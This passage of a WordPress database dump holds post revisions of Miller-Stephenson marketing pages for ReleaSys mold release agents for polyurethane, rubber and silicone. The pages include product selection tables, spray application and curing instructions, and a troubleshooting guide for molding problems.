of the polyurethane molding operation.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> In regions that have strict VOC regulations and air quality permitting, or if your company require products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;"><strong><span style="font-size: 105%;">Application Guide for Polyurethane Mold Relea</span>se Agents :</strong></span></h2>\r\n<span style="text-decoration: underline; font-size: 105%;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Automotive and Recreational seating</span></li>\r\n 	<li><span style="font-size: 105%;">Guards and Cushioning equipment</span></li>\r\n 	<li><span style="font-size: 105%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 105%;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Pillows and Mattresses</span></li>\r\n 	<li><span style="font-size: 105%;">Insulation</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 105%;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Bowling pins</span></li>\r\n 	<li><span style="font-size: 105%;">Golf carts</span></li>\r\n 	<li><span style="font-size: 105%;">Automotive Dashboards</span></li>\r\n</ul>\r\n<h1><strong><span style="text-decoration: underline;">Selection Guide:</span></strong></h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Product</strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Carrier Solvent </strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Finish </strong></span></span></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Description</strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;"> Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Rapid Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Immediate Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Matte - Semigloss</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Dry and Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Durability</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'Polyurethane Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-07 14:06:52', '2016-11-07 14:06:52', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2919, 3, '2016-11-07 14:10:21', '2016-11-07 14:10:21', '<h1 style="text-align: justify;">Pioneering Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\r\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements in today\'s toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>™, and our worldwide reputation for unsurpassed expertise, consistent quality, and value. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\r\n\r\nReleaSys Rubber Mold Release agents are recommended for releasing all natural and synthetic rubbers / elastomer compounds. Our release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates. ReleaSys Silicone Mold Release agents offer superior durability, maximized surface adhesion and ease of release.\r\n<h2><span style="text-decoration: underline;"><strong>Low or No VOC, Minimal Odor, 100% Non-Flammable</strong></span></h2>\r\nOur ReleaSys mold release products, include <strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">solvent based</a></strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.\r\n<h1>Application Guide</h1>\r\n<table style="height: 1010px;" width="829">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\r\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Carrier Solvent </span></span></td>\r\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\r\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High-Temperature</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Low Mold Building</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8500</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instantaneous Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">High Flow Injection Molding</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal Rejection Rate</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High Slip</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8800</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Highly Filled Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8500</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Release most compounds</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Multiple releases</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Rubber & Silicone Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-11-07 14:10:21', '2016-11-07 14:10:21', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2920, 3, '2016-11-07 14:13:44', '2016-11-07 14:13:44', '<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (1-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding, it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cured ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to 